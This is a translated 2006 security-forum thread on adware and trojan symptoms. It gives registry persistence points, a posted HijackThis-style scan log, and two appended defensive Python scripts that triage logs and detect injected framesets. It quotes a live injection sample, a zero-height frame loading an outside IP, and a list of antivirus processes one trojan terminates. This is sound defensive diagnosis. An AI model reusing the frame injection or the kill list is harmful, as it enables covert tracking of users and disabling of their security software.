Rising Kaka Security Forum, Anti-virus / Anti-rogue-software board

IE ads, (boot-time) popups, QQ messages and the like are getting worse: a list of the common symptoms

IE ads, popups, QQ messages and the like are getting worse and worse; it is time to properly diagnose this. (2006-11-08 14:13)

Cases, listing some of the behaviors:

QQ message
WinDir\rundll.exe
WinDir\killme.bat
Software\Microsoft\Windows\CurrentVersion\Run

Boot-time popup
WinDir\csrss.exe
WinDir\killme.bat
Software\Microsoft\Windows\CurrentVersion\Run
Creates a link shortcut in Favorites
USERPROFILE\Favorites\url [InternetShortcut]
Sets the home page
Software\Microsoft\Internet Explorer\Main\
Start Page
Software\Policies\Microsoft\Internet Explorer\Policies\Microsoft\Internet Explorer\Control Panel\
HomePage (disables changing the home page)

Auto-clicking ads
WinDir\services.exe
WinDir\killme.bat
Software\Microsoft\Windows\CurrentVersion\Run
Creates a link shortcut in Favorites
USERPROFILE\Favorites\url [InternetShortcut]

Super boot-time popup popwin
Adds a service
"Provides accelerated startup for the system"
delme.bat
Software\Microsoft\Windows\CurrentVersion\Run\
Terminates the following security-software services (processes)
qqkav agentsvr frogagent kvxp kvsrvxp kregex trojdie kvcenter kvmon uihost KVSrvXP_1 KVSrvXP KvXP KVMonXP vsmon vptray rtvscan Navap Norton Symantec webscanx vsstat vshwin32 alogserv avsynmgr avconsol Iparmor KWatch KPfwSvc KMailMon KavPFW KAVStart KAVSvc KULANSyn KPopMon KWatchUI KAVPlus rfwsrv RAVMON rfwmain RAVTIMER RAV.exe RavStub Ravmond CCENTER RsCCenter SharedAccess

IE ads
Mainly adds a BHO
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
HKCR\CLSID\
HKCR\
the corresponding BHO name and CLSID; a guard on the key values is set at the CLSID entry
Registers the BHO component iebhook.dll (iebhook.dll.dll)
Note: some are packed downloaders with behavior similar to the above; they add rules to get past AVP's proactive defense / proactive protection

------------------------------------------------------------------

ShellExecuteHooks are also rather troublesome

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks

The recent Ad1.exe (fake QQ mini home page & 37ss.com/index20.htm) goes further and replaces system service files

------------------------------------------------------------

Today's IE ads, popups, QQ messages and so on use techniques ever closer to those of viruses, get more and more in people's way, and bring trojan downloaders with them. Truly hateful......

Let's look for similar cases :-)

Original post: http://hi.baidu.com/killvir/blog/item/06176c81202d52d8bc3e1eb4.html
Last edited 2006-11-19 06:10:04

Suspicious files: put them in a password-protected archive (password: virus) and send to

newvirus@cisrt.com

Heh, grabbing the sofa (first reply) to bump this up.

Seconded... thanks for the hard work.

I hope the law will punish them~~~ I have been hit by ad-trojan viruses again and again these past few months.

Right, they should be punished by law.

Frustrating.

My virus diary: I have this symptom and cannot remove it.

Logfile of Kaka v2.0.2.1 Scan Module v1.0.0.40
Scan saved at 20:04:10, on 2006-11-17
Platform: Microsoft Windows XP Professional Service Pack 2 (Build 2600)
MSIE: Internet Explorer v6.00 SP2; (6.00.2900.2180 (xpsp_sp2_rtm.040803-2158))


R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page=C:\WINDOWS\system32\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page=%SystemRoot%\system32\blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page=http://www.ali213.com
R3 - URLSearchHook: Tencent SearchHook - {DB8B2393-7A6C-4C76-88CE-6B1F6FF6FFE9} - C:\Program Files\TENCENT\Adplus\SSAddr.dll
O1 - Hosts: 127.0.0.1      localhost
O2 - BHO: WebThunder Browser Helper - {00000AAA-A363-466E-BEF5-9BB68697AA7F} - D:\xunlei\WebThunderBHO_015.dll
O2 - BHO: Tencent Browser Helper - {0C7C23EF-A848-485B-873C-0ED954731014} - C:\Program Files\TENCENT\Adplus\SSAddr.dll
O2 - BHO:  - {385AB8C6-FB22-4D17-8834-064E2BA0A6F0} -  (file missing)
O2 - BHO: QQBrowserHelperObject Class - {54EBD53A-9BC1-480B-966A-843A333CA162} - C:\Program Files\Tencent\QQ\QQIEHelper.dll
O2 - BHO:  - {669751ED-D558-49AE-B01A-3B374CC7910E} - C:\WINDOWS\system32\ssup.dll
O2 - BHO: IeCatch2 Class - {A5366673-E8CA-11D3-9CD9-0090271D075B} - C:\PROGRA~1\FLASHGET\jccatch.dll
O3 - Toolbar: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - C:\PROGRA~1\FLASHGET\fgiebar.dll
O3 - Toolbar: 卡卡上网安全助手 - {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} - C:\WINDOWS\system32\KakaTool.dll
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [RfwMain] "C:\Program Files\Rising\Rfw\rfwmain.exe" -Startup
O4 - HKLM\..\Run: [WebThunder] D:\xunlei\WebThunder.exe
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [RavTask] "C:\Program Files\Rising\Rav\RavTask.exe" -system
O4 - HKLM\..\Run: [miniqqlive] "C:\Program Files\Tencent\QQLive\MiniQQLive.exe"
O4 - HKLM\..\Run: [stup.exe] C:\PROGRA~1\TENCENT\Adplus\stup.exe
O4 - HKLM\..\Run: [coopen] C:\Program Files\coopen\coopen.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\13.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\13.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tdsetup.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tdsetup.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dodolook096.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dodolook096.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lmdm_setup_2.1_110.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\lmdm_setup_2.1_110.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dodolook029.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dodolook029.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bind_40254.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bind_40254.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\setup133.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\setup133.exe
O4 - HKLM\..\RunOnce: [RavStub] "C:\Program Files\Rising\Rav\ravstub.exe" /RUNONCE
O4 - HKLM\..\RunOnce: [KKDelay] C:\Program Files\Rising\KakaToolBar\RunOnce.exe
O4 - Startup: desktop.ini =
O4 - Startup: 腾讯QQ.lnk = C:\Program Files\Tencent\QQ\QQ.exe
O4 - Global Startup: desktop.ini =
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O8 - Extra context menu item: 上传到QQ网络硬盘 - C:\Program Files\Tencent\QQ\AddToNetDisk.htm
O8 - Extra context menu item: 上傳到QQ網路硬碟 - C:\Program Files\Tencent\QQ\AddToNetDisk.htm
O8 - Extra context menu item: 使用Web迅雷下载 - D:\xunlei\GetUrl.htm
O8 - Extra context menu item: 使用Web迅雷下载全部链接 - D:\xunlei\GetAllUrl.htm
O8 - Extra context menu item: 使用网际快车下载 - C:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: 使用网际快车下载全部链接 - C:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: 导出到 Microsoft Office Excel(&X) - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: 新增到QQ自定義面板 - C:\Program Files\Tencent\QQ\AddPanel.htm
O8 - Extra context menu item: 新增到QQ表情 - C:\Program Files\Tencent\QQ\AddEmotion.htm
O8 - Extra context menu item: 添加到QQ自定义面板 - C:\Program Files\Tencent\QQ\AddPanel.htm
O8 - Extra context menu item: 添加到QQ表情 - C:\Program Files\Tencent\QQ\AddEmotion.htm
O8 - Extra context menu item: 用QQ彩信发送该图片 - C:\Program Files\Tencent\QQ\SendMMS.htm
O9 - Extra Button: 启动Web迅雷 - {962EFB8E-2683-42d4-AC74-AAA4C759B9C6} - http://my.xunlei.com (file missing)
O9 - Extra 'Tools' menuitem: 启动Web迅雷 - {962EFB8E-2683-42d4-AC74-AAA4C759B9C6} - http://my.xunlei.com (file missing)
O9 - Extra Button: QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - C:\Program Files\Tencent\QQ\QQ.EXE
O9 - Extra 'Tools' menuitem: 腾讯QQ - {c95fe080-8f5d-11d2-a20b-00aa003c157b} - C:\Program Files\Tencent\QQ\QQ.EXE
O9 - Extra Button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FLASHGET\flashget.exe
O9 - Extra 'Tools' menuitem: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FLASHGET\flashget.exe
O9 - Extra Button: (no name) - {DEDEB80D-FA35-45d9-9460-4983E5A8AFE6} - C:\Program Files\Tencent\QQ\QQIEHelper.dll
O9 - Extra 'Tools' menuitem: QQ炫彩工具条设置 - {DEDEB80D-FA35-45d9-9460-4983E5A8AFE6} - C:\Program Files\Tencent\QQ\QQIEHelper.dll
O9 - Extra Button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra Button: 访问瑞星网站 - {FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E444} - http://www.rising.com.cn (file missing)
O9 - Extra Button: 访问卡卡社区 - {FF2DE7A6-ECB1-4CBC-9C0E-D92A9E66E445} - http://www.ikaka.com (file missing)
O10 - Unknown file in Winsock LSP: C:\WINDOWS\system32\cdnns.dll
O11 - Options group: [TBH] 中文搜搜
O14 - IERESET.INF: START_PAGE_URL=http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
O18 - Filter : application/octet-stream - {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\WINDOWS\system32\mscoree.dll
O18 - Filter : application/x-complus - {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\WINDOWS\system32\mscoree.dll
O18 - Filter : application/x-msdownload - {1E66F26B-79EE-11D2-8710-00C04F79ED0D} - C:\WINDOWS\system32\mscoree.dll
O18 - Protocol: about - {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: cdl - {3dd53d40-7b8b-11D0-b013-00aa0059ce02} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: dvd - {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\WINDOWS\system32\msvidctl.dll
O18 - Protocol: file - {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ftp - {79eac9e3-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: gopher - {79eac9e4-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: http - {79eac9e2-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: https - {79eac9e5-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ipp - (no CLSID) - (no file)
O18 - Protocol: its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: javascript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: local - {79eac9e7-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: mailto - {3050f3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: mhtml - {05300401-BCBC-11d0-85E3-00C04FD85AB4} - C:\WINDOWS\system32\inetcomm.dll
O18 - Protocol: mk - {79eac9e6-baf9-11ce-8c82-00aa004ba90b} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ms-its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: msdaipp - (no CLSID) - (no file)
O18 - Protocol: res - {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: sysimage - {76E67A63-06E9-11D2-A840-006008059382} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: tv - {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E} - C:\WINDOWS\system32\msvidctl.dll
O18 - Protocol: vbscript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: wia - {13F3EA8B-91D7-4F0A-AD76-D2853AC8BECE} - C:\WINDOWS\system32\wiascr.dll
O23 - Service: AVG Anti-Spyware Guard (AVG Anti-Spyware Guard) - Anti-Malware Development a.s. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: Human Interface Device Access (HidServ) -  - C:\WINDOWS\system32\svchost.exe -k netsvcs
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Rising Proxy  Service (RfwProxySrv) - Beijing Rising Technology Co., Ltd. - c:\program files\rising\rfw\rfwproxy.exe
O23 - Service: Rising Personal Firewall Service (RfwService) - Beijing Rising Technology Co., Ltd. - c:\program files\rising\rfw\rfwsrv.exe
O23 - Service: Rising Process Communication Center (RsCCenter) - Beijing Rising Technology Co., Ltd. - "C:\Program Files\Rising\Rav\CCenter.exe"
O23 - Service: Rising RealTime Monitor (RsRavMon) - Beijing Rising Technology Co., Ltd. - "C:\Program Files\Rising\Rav\Ravmond.exe"
O23 - Service: User Privilege Service (usprserv) - Microsoft Corporation - C:\WINDOWS\system32\svchost.exe -k netsvcs
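The persistence points the first post lists (the Run key, Browser Helper Objects under their CLSIDs, the Internet Explorer policy lock on the home page, Winsock hooks) are exactly what a HijackThis-style log such as the Kaka log above reports, one section code per location. The script below is an added example, not code from the forum or from Rising: it parses lines in that log format and flags the entries a practitioner would look at first. The sample lines are a subset copied verbatim from the log posted in this thread; the heuristics are my own assumptions and deliberately conservative (an autorun that launches from a Temp directory, a BHO registered with no name or with its DLL missing, an unknown Winsock LSP, and IE policy restrictions present). A flag means "inspect this", not "malicious".

```python
import re
from typing import Dict, List, NamedTuple

# Subset of the Kaka/HijackThis-style log posted in this thread (copied verbatim).
SAMPLE_LOG = r"""
O2 - BHO: WebThunder Browser Helper - {00000AAA-A363-466E-BEF5-9BB68697AA7F} - D:\xunlei\WebThunderBHO_015.dll
O2 - BHO:  - {385AB8C6-FB22-4D17-8834-064E2BA0A6F0} -  (file missing)
O2 - BHO:  - {669751ED-D558-49AE-B01A-3B374CC7910E} - C:\WINDOWS\system32\ssup.dll
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\13.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\13.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dodolook096.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dodolook096.exe
O4 - HKLM\..\Run: [C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bind_40254.exe] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\bind_40254.exe
O4 - HKLM\..\RunOnce: [RavStub] "C:\Program Files\Rising\Rav\ravstub.exe" /RUNONCE
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O10 - Unknown file in Winsock LSP: C:\WINDOWS\system32\cdnns.dll
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
""".strip().splitlines()

# Registry location behind each log section, as named in the first post of this thread.
SECTION_LOCATION = {
    "O2": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects (CLSID resolved under HKCR\CLSID)",
    "O4": r"HKLM/HKCU\Software\Microsoft\Windows\CurrentVersion\Run (and RunOnce)",
    "O6": r"HKCU\Software\Policies\Microsoft\Internet Explorer (Restrictions, Control Panel\HomePage lock)",
    "O10": "Winsock LSP catalog (layered service provider DLLs)",
}


class Finding(NamedTuple):
    section: str
    reason: str
    line: str


_ENTRY = re.compile(r"^(O\d+|R\d) - (.*)$")
_BHO = re.compile(r"^BHO: (?P<name>.*?) - \{(?P<clsid>[0-9A-Fa-f-]+)\} - (?P<path>.*)$")
_RUN = re.compile(r"^(?P<hive>HK\w+)\\\.\.\\(?P<key>Run\w*): \[(?P<name>[^\]]*)\] (?P<cmd>.*)$")
# Assumed markers for "launched from a Temp directory" (8.3 and long forms, lower-cased).
_TEMP_MARKERS = ("\\temp\\", "locals~1\\temp")


def triage(lines: List[str]) -> List[Finding]:
    """Return the log entries worth a closer look, with the reason each was flagged."""
    findings: List[Finding] = []
    for raw in lines:
        line = raw.strip()
        m = _ENTRY.match(line)
        if not m:
            continue
        section, rest = m.group(1), m.group(2)
        if section == "O2":
            b = _BHO.match(rest)
            if b and not b["name"].strip():
                findings.append(Finding(section, "BHO registered without a name", line))
            elif b and b["path"].strip() == "(file missing)":
                findings.append(Finding(section, "BHO CLSID registered but DLL missing", line))
        elif section == "O4":
            r = _RUN.match(rest)
            if r and any(t in r["cmd"].lower() for t in _TEMP_MARKERS):
                findings.append(Finding(section, "autorun launches an executable from a Temp directory", line))
        elif section == "O6":
            findings.append(Finding(section, "IE policy restrictions present (home page / settings locked)", line))
        elif section == "O10" and rest.lower().startswith("unknown file in winsock lsp"):
            findings.append(Finding(section, "unknown Winsock LSP DLL", line))
    return findings


def counts_by_section(findings: List[Finding]) -> Dict[str, int]:
    """How many flagged entries fall under each log section code."""
    out: Dict[str, int] = {}
    for f in findings:
        out[f.section] = out.get(f.section, 0) + 1
    return out


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f.section}] {f.reason}\n    {f.line}\n    location: {SECTION_LOCATION[f.section]}")
```

Run against the sample it flags eight entries: the two nameless BHOs, the three autoruns under the user's Temp directory, both IE policy lines and the unknown LSP; the WebThunder BHO, ctfmon and the Rising RunOnce entry pass. The same triage applies to a full log, and the location map tells you which key to open in the registry editor (or which HijackThis fix line to tick) for each hit.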

When I open a website in the browser (e.g. http://www.xxx.com/index.asp) and view the source, the following code is always displayed, including on big sites like YAHOO. It only affects pages containing http://www.xxx.com/index.asp.

<HTML><frameset border='0' frameSpacing='0' rows='0,100%' frameBorder='0'>
<frame id ='frm123' name='frm123' src='http://220.167.29.103:9123/ndatin.aspx?param=ABdXNlcm5hbWU9Z2EyMjQyNTg3JnBvbGljeWlkPTM=&ref=1'><frame id ='frmOLD' name='frmOLD' src='http://yahoo.com.cn/?'></frameset></HTML>

For example, browsing http://www.gahn520.com/xinban/index.asp and viewing the source shows
<HTML><frameset border='0' frameSpacing='0' rows='0,100%' frameBorder='0'>
<frame id ='frm123' name='frm123' src='http://220.167.29.103:9123/ndatin.aspx?param=ABdXNlcm5hbWU9Z2EyMjQyNTg3JnBvbGljeWlkPTM=&ref=1'><frame id ='frmOLD' name='frmOLD' src=http://www.gahn520.com/xinban/?'></frameset></HTML>

Have I got a virus? Why doesn't Rising detect anything........????? Or is it YAHOO's rogue software? IE has been tampered with.

My QQ is 6706682, please help
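The source quoted in the post above has a recognisable shape: the requested page has been wrapped in a two-row frameset whose first row has height 0 and loads a URL on a different host (220.167.29.103:9123), while the second row at 100% loads the site that was actually requested, so the user sees the site and never sees the hidden frame. Whatever is inserting that wrapper, the pattern itself is easy to check for. The script below is an added example, not code from the thread: it parses an HTML response with the standard library's `html.parser`, finds a frameset with a collapsed row, and reports a hidden frame whose host differs from the host of the URL that was requested. The sample HTML is the snippet from the post (copied as posted, including the stray quote in the second `src`); the clean control page is constructed, as is the `www.example.com` host. It handles one top-level frameset, which is all the posted source has.

```python
from html.parser import HTMLParser
from typing import List, NamedTuple, Optional
from urllib.parse import urlparse

# HTML source quoted in the last post of this thread (copied as posted).
SAMPLE_HTML = """<HTML><frameset border='0' frameSpacing='0' rows='0,100%' frameBorder='0'>
<frame id ='frm123' name='frm123' src='http://220.167.29.103:9123/ndatin.aspx?param=ABdXNlcm5hbWU9Z2EyMjQyNTg3JnBvbGljeWlkPTM=&ref=1'><frame id ='frmOLD' name='frmOLD' src=http://www.gahn520.com/xinban/?'></frameset></HTML>"""

# Constructed control page: an ordinary frameset whose frames stay on the requested host.
CLEAN_HTML = """<html><frameset rows='20%,80%'>
<frame src='/nav.asp'><frame src='http://www.example.com/main.asp'></frameset></html>"""


class Injection(NamedTuple):
    hidden_src: str    # URL loaded in the collapsed (zero-height) frame
    hidden_host: str   # host of that URL, different from the requested host
    visible_src: str   # URL of the frame that shows the requested site


def _zero_rows(rows: str) -> List[int]:
    """Indexes of frameset rows collapsed to nothing, e.g. '0,100%' -> [0]."""
    return [i for i, r in enumerate(rows.split(",")) if r.strip() in ("0", "0%", "0px")]


class _FramesetParser(HTMLParser):
    """Collects the zero-height row indexes and every <frame src> in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.hidden_idx: List[int] = []
        self.frames: List[str] = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "frameset":
            self.hidden_idx = _zero_rows(a.get("rows", ""))
        elif tag == "frame":
            # Strip stray quotes: the posted source has an unquoted src ending in a lone '.
            self.frames.append(a.get("src", "").strip().strip("'\""))


def detect_injection(html: str, requested_url: str) -> Optional[Injection]:
    """Return the hidden off-host frame wrapping the requested page, or None if the shape is absent."""
    p = _FramesetParser()
    p.feed(html)
    p.close()
    if not p.hidden_idx:
        return None
    wanted = urlparse(requested_url).hostname
    for i in p.hidden_idx:
        if i >= len(p.frames):
            continue
        host = urlparse(p.frames[i]).hostname
        if host and host != wanted:
            visible = next((f for j, f in enumerate(p.frames) if j not in p.hidden_idx), "")
            return Injection(p.frames[i], host, visible)
    return None


if __name__ == "__main__":
    hit = detect_injection(SAMPLE_HTML, "http://www.gahn520.com/xinban/index.asp")
    print("hidden frame:", hit.hidden_src if hit else None)
    print("clean page:", detect_injection(CLEAN_HTML, "http://www.example.com/index.asp"))
```

Fetch the page with any HTTP client from the affected machine and feed the body to `detect_injection` together with the URL you asked for; a result means the response you received is not the page the site served as its top-level document. Comparing the same URL fetched from a different network connection is the quickest way to tell whether the wrapper originates on the machine or somewhere on the path.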
Powered by Discuz!NT